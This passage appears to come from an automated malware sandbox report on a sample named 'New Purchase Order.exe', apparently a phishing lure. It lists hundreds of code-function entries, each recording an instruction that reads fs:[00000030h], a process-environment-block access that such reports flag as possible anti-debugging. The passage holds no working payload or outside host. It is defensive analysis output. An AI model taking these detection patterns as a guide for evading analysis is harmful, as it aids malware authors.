Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017C823B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_018A62D6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017E02E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017E02E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017E02E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017DA2C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017DA2C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017DA2C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017DA2C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017DA2C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01858243 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01858243 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_018A625D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0188A250 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0188A250 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01880274 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01880274 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01880274 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01880274 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01880274 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01880274 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01880274 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01880274 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01880274 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01880274 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01880274 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01880274 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01804588 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0180E59C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_018505A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_018505A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_018505A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017D8550 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017D8550 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017FE53E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017FE53E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017FE53E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017FE53E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017FE53E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017E0535 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017E0535 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017E0535 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017E0535 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017E0535 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017E0535 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180E5CF mov eax, dword ptr fs:[00000030h]9_2_0180E5CF
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180E5CF mov eax, dword ptr fs:[00000030h]9_2_0180E5CF
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180A5D0 mov eax, dword ptr fs:[00000030h]9_2_0180A5D0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180A5D0 mov eax, dword ptr fs:[00000030h]9_2_0180A5D0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180C5ED mov eax, dword ptr fs:[00000030h]9_2_0180C5ED
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180C5ED mov eax, dword ptr fs:[00000030h]9_2_0180C5ED
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01866500 mov eax, dword ptr fs:[00000030h]9_2_01866500
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018A4500 mov eax, dword ptr fs:[00000030h]9_2_018A4500
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018A4500 mov eax, dword ptr fs:[00000030h]9_2_018A4500
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018A4500 mov eax, dword ptr fs:[00000030h]9_2_018A4500
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018A4500 mov eax, dword ptr fs:[00000030h]9_2_018A4500
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018A4500 mov eax, dword ptr fs:[00000030h]9_2_018A4500
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018A4500 mov eax, dword ptr fs:[00000030h]9_2_018A4500
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018A4500 mov eax, dword ptr fs:[00000030h]9_2_018A4500
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017FE5E7 mov eax, dword ptr fs:[00000030h]9_2_017FE5E7
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017FE5E7 mov eax, dword ptr fs:[00000030h]9_2_017FE5E7
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017FE5E7 mov eax, dword ptr fs:[00000030h]9_2_017FE5E7
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017FE5E7 mov eax, dword ptr fs:[00000030h]9_2_017FE5E7
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017FE5E7 mov eax, dword ptr fs:[00000030h]9_2_017FE5E7
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017FE5E7 mov eax, dword ptr fs:[00000030h]9_2_017FE5E7
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017FE5E7 mov eax, dword ptr fs:[00000030h]9_2_017FE5E7
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017FE5E7 mov eax, dword ptr fs:[00000030h]9_2_017FE5E7
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D25E0 mov eax, dword ptr fs:[00000030h]9_2_017D25E0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D65D0 mov eax, dword ptr fs:[00000030h]9_2_017D65D0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017F45B1 mov eax, dword ptr fs:[00000030h]9_2_017F45B1
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017F45B1 mov eax, dword ptr fs:[00000030h]9_2_017F45B1
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180656A mov eax, dword ptr fs:[00000030h]9_2_0180656A
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180656A mov eax, dword ptr fs:[00000030h]9_2_0180656A
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180656A mov eax, dword ptr fs:[00000030h]9_2_0180656A
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D2582 mov eax, dword ptr fs:[00000030h]9_2_017D2582
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D2582 mov ecx, dword ptr fs:[00000030h]9_2_017D2582
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017FA470 mov eax, dword ptr fs:[00000030h]9_2_017FA470
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017FA470 mov eax, dword ptr fs:[00000030h]9_2_017FA470
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017FA470 mov eax, dword ptr fs:[00000030h]9_2_017FA470
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0188A49A mov eax, dword ptr fs:[00000030h]9_2_0188A49A
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017C645D mov eax, dword ptr fs:[00000030h]9_2_017C645D
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017F245A mov eax, dword ptr fs:[00000030h]9_2_017F245A
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018044B0 mov ecx, dword ptr fs:[00000030h]9_2_018044B0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0185A4B0 mov eax, dword ptr fs:[00000030h]9_2_0185A4B0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017CC427 mov eax, dword ptr fs:[00000030h]9_2_017CC427
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017CE420 mov eax, dword ptr fs:[00000030h]9_2_017CE420
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017CE420 mov eax, dword ptr fs:[00000030h]9_2_017CE420
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017CE420 mov eax, dword ptr fs:[00000030h]9_2_017CE420
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01808402 mov eax, dword ptr fs:[00000030h]9_2_01808402
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01808402 mov eax, dword ptr fs:[00000030h]9_2_01808402
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01808402 mov eax, dword ptr fs:[00000030h]9_2_01808402
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D04E5 mov ecx, dword ptr fs:[00000030h]9_2_017D04E5
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01856420 mov eax, dword ptr fs:[00000030h]9_2_01856420
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01856420 mov eax, dword ptr fs:[00000030h]9_2_01856420
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01856420 mov eax, dword ptr fs:[00000030h]9_2_01856420
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01856420 mov eax, dword ptr fs:[00000030h]9_2_01856420
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01856420 mov eax, dword ptr fs:[00000030h]9_2_01856420
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01856420 mov eax, dword ptr fs:[00000030h]9_2_01856420
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01856420 mov eax, dword ptr fs:[00000030h]9_2_01856420
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180A430 mov eax, dword ptr fs:[00000030h]9_2_0180A430
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180E443 mov eax, dword ptr fs:[00000030h]9_2_0180E443
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180E443 mov eax, dword ptr fs:[00000030h]9_2_0180E443
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180E443 mov eax, dword ptr fs:[00000030h]9_2_0180E443
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180E443 mov eax, dword ptr fs:[00000030h]9_2_0180E443
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180E443 mov eax, dword ptr fs:[00000030h]9_2_0180E443
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180E443 mov eax, dword ptr fs:[00000030h]9_2_0180E443
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180E443 mov eax, dword ptr fs:[00000030h]9_2_0180E443
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180E443 mov eax, dword ptr fs:[00000030h]9_2_0180E443
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D64AB mov eax, dword ptr fs:[00000030h]9_2_017D64AB
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0188A456 mov eax, dword ptr fs:[00000030h]9_2_0188A456
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0185C460 mov ecx, dword ptr fs:[00000030h]9_2_0185C460
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0187678E mov eax, dword ptr fs:[00000030h]9_2_0187678E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D8770 mov eax, dword ptr fs:[00000030h]9_2_017D8770
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E0770 mov eax, dword ptr fs:[00000030h]9_2_017E0770
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E0770 mov eax, dword ptr fs:[00000030h]9_2_017E0770
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E0770 mov eax, dword ptr fs:[00000030h]9_2_017E0770
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E0770 mov eax, dword ptr fs:[00000030h]9_2_017E0770
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E0770 mov eax, dword ptr fs:[00000030h]9_2_017E0770
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E0770 mov eax, dword ptr fs:[00000030h]9_2_017E0770
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E0770 mov eax, dword ptr fs:[00000030h]9_2_017E0770
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E0770 mov eax, dword ptr fs:[00000030h]9_2_017E0770
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E0770 mov eax, dword ptr fs:[00000030h]9_2_017E0770
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E0770 mov eax, dword ptr fs:[00000030h]9_2_017E0770
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E0770 mov eax, dword ptr fs:[00000030h]9_2_017E0770
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E0770 mov eax, dword ptr fs:[00000030h]9_2_017E0770
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018847A0 mov eax, dword ptr fs:[00000030h]9_2_018847A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D0750 mov eax, dword ptr fs:[00000030h]9_2_017D0750
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018507C3 mov eax, dword ptr fs:[00000030h]9_2_018507C3
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0185E7E1 mov eax, dword ptr fs:[00000030h]9_2_0185E7E1
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D0710 mov eax, dword ptr fs:[00000030h]9_2_017D0710
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180C700 mov eax, dword ptr fs:[00000030h]9_2_0180C700
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D47FB mov eax, dword ptr fs:[00000030h]9_2_017D47FB
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D47FB mov eax, dword ptr fs:[00000030h]9_2_017D47FB
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01800710 mov eax, dword ptr fs:[00000030h]9_2_01800710
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017F27ED mov eax, dword ptr fs:[00000030h]9_2_017F27ED
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017F27ED mov eax, dword ptr fs:[00000030h]9_2_017F27ED
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017F27ED mov eax, dword ptr fs:[00000030h]9_2_017F27ED
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180C720 mov eax, dword ptr fs:[00000030h]9_2_0180C720
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180C720 mov eax, dword ptr fs:[00000030h]9_2_0180C720
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0184C730 mov eax, dword ptr fs:[00000030h]9_2_0184C730
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180273C mov eax, dword ptr fs:[00000030h]9_2_0180273C
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180273C mov ecx, dword ptr fs:[00000030h]9_2_0180273C
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180273C mov eax, dword ptr fs:[00000030h]9_2_0180273C
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017DC7C0 mov eax, dword ptr fs:[00000030h]9_2_017DC7C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180674D mov esi, dword ptr fs:[00000030h]9_2_0180674D
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180674D mov eax, dword ptr fs:[00000030h]9_2_0180674D
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180674D mov eax, dword ptr fs:[00000030h]9_2_0180674D
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01854755 mov eax, dword ptr fs:[00000030h]9_2_01854755
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01812750 mov eax, dword ptr fs:[00000030h]9_2_01812750
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01812750 mov eax, dword ptr fs:[00000030h]9_2_01812750
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D07AF mov eax, dword ptr fs:[00000030h]9_2_017D07AF
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0185E75D mov eax, dword ptr fs:[00000030h]9_2_0185E75D
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180C6A6 mov eax, dword ptr fs:[00000030h]9_2_0180C6A6
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018066B0 mov eax, dword ptr fs:[00000030h]9_2_018066B0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017EC640 mov eax, dword ptr fs:[00000030h]9_2_017EC640
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180A6C7 mov ebx, dword ptr fs:[00000030h]9_2_0180A6C7
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180A6C7 mov eax, dword ptr fs:[00000030h]9_2_0180A6C7
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D262C mov eax, dword ptr fs:[00000030h]9_2_017D262C
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017EE627 mov eax, dword ptr fs:[00000030h]9_2_017EE627
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018506F1 mov eax, dword ptr fs:[00000030h]9_2_018506F1
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018506F1 mov eax, dword ptr fs:[00000030h]9_2_018506F1
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E260B mov eax, dword ptr fs:[00000030h]9_2_017E260B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E260B mov eax, dword ptr fs:[00000030h]9_2_017E260B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E260B mov eax, dword ptr fs:[00000030h]9_2_017E260B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E260B mov eax, dword ptr fs:[00000030h]9_2_017E260B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E260B mov eax, dword ptr fs:[00000030h]9_2_017E260B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E260B mov eax, dword ptr fs:[00000030h]9_2_017E260B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E260B mov eax, dword ptr fs:[00000030h]9_2_017E260B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0184E6F2 mov eax, dword ptr fs:[00000030h]9_2_0184E6F2
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0184E6F2 mov eax, dword ptr fs:[00000030h]9_2_0184E6F2
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0184E6F2 mov eax, dword ptr fs:[00000030h]9_2_0184E6F2
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0184E6F2 mov eax, dword ptr fs:[00000030h]9_2_0184E6F2
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0184E609 mov eax, dword ptr fs:[00000030h]9_2_0184E609
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01812619 mov eax, dword ptr fs:[00000030h]9_2_01812619
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01806620 mov eax, dword ptr fs:[00000030h]9_2_01806620
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01808620 mov eax, dword ptr fs:[00000030h]9_2_01808620
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180A660 mov eax, dword ptr fs:[00000030h]9_2_0180A660
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180A660 mov eax, dword ptr fs:[00000030h]9_2_0180A660
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0189866E mov eax, dword ptr fs:[00000030h]9_2_0189866E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0189866E mov eax, dword ptr fs:[00000030h]9_2_0189866E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D4690 mov eax, dword ptr fs:[00000030h]9_2_017D4690
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D4690 mov eax, dword ptr fs:[00000030h]9_2_017D4690
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01802674 mov eax, dword ptr fs:[00000030h]9_2_01802674
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017F6962 mov eax, dword ptr fs:[00000030h]9_2_017F6962
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017F6962 mov eax, dword ptr fs:[00000030h]9_2_017F6962
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017F6962 mov eax, dword ptr fs:[00000030h]9_2_017F6962
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018589B3 mov esi, dword ptr fs:[00000030h]9_2_018589B3
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018589B3 mov eax, dword ptr fs:[00000030h]9_2_018589B3
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018589B3 mov eax, dword ptr fs:[00000030h]9_2_018589B3
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018669C0 mov eax, dword ptr fs:[00000030h]9_2_018669C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018049D0 mov eax, dword ptr fs:[00000030h]9_2_018049D0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0189A9D3 mov eax, dword ptr fs:[00000030h]9_2_0189A9D3
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017C8918 mov eax, dword ptr fs:[00000030h]9_2_017C8918
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017C8918 mov eax, dword ptr fs:[00000030h]9_2_017C8918
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0185E9E0 mov eax, dword ptr fs:[00000030h]9_2_0185E9E0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018029F9 mov eax, dword ptr fs:[00000030h]9_2_018029F9
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018029F9 mov eax, dword ptr fs:[00000030h]9_2_018029F9
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0184E908 mov eax, dword ptr fs:[00000030h]9_2_0184E908
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0184E908 mov eax, dword ptr fs:[00000030h]9_2_0184E908
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0185C912 mov eax, dword ptr fs:[00000030h]9_2_0185C912
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017DA9D0 mov eax, dword ptr fs:[00000030h]9_2_017DA9D0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017DA9D0 mov eax, dword ptr fs:[00000030h]9_2_017DA9D0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017DA9D0 mov eax, dword ptr fs:[00000030h]9_2_017DA9D0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017DA9D0 mov eax, dword ptr fs:[00000030h]9_2_017DA9D0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017DA9D0 mov eax, dword ptr fs:[00000030h]9_2_017DA9D0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017DA9D0 mov eax, dword ptr fs:[00000030h]9_2_017DA9D0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0186892B mov eax, dword ptr fs:[00000030h]9_2_0186892B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0185892A mov eax, dword ptr fs:[00000030h]9_2_0185892A
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01850946 mov eax, dword ptr fs:[00000030h]9_2_01850946
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018A4940 mov eax, dword ptr fs:[00000030h]9_2_018A4940
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D09AD mov eax, dword ptr fs:[00000030h]9_2_017D09AD
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D09AD mov eax, dword ptr fs:[00000030h]9_2_017D09AD
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E29A0 mov eax, dword ptr fs:[00000030h]9_2_017E29A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E29A0 mov eax, dword ptr fs:[00000030h]9_2_017E29A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E29A0 mov eax, dword ptr fs:[00000030h]9_2_017E29A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E29A0 mov eax, dword ptr fs:[00000030h]9_2_017E29A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E29A0 mov eax, dword ptr fs:[00000030h]9_2_017E29A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E29A0 mov eax, dword ptr fs:[00000030h]9_2_017E29A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E29A0 mov eax, dword ptr fs:[00000030h]9_2_017E29A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E29A0 mov eax, dword ptr fs:[00000030h]9_2_017E29A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E29A0 mov eax, dword ptr fs:[00000030h]9_2_017E29A0
